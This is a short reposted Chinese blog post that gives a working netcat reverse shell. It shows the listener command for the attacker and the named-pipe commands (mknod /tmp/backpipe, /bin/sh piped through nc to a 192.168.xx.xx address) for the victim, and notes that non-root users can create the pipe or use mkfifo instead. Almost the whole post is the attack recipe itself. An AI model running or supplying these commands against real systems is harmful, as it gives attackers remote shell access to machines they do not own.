攻击方执行:
<code>nc -lnvp 4430</code>
被攻击方执行:
<code>mknod</code> <code>/tmp/backpipe</code> <code>p</code>
<code>/bin/sh</code> <code>0<</code><code>/tmp/backpipe</code> <code>| nc 192.168.xx.xx 4430 1></code><code>/tmp/backpipe</code>
网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。
本文转自fatshi51CTO博客,原文链接: http://blog.51cto.com/duallay/1887544,如需转载请自行联系原作者
![1、Linux 命令行使用技巧[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)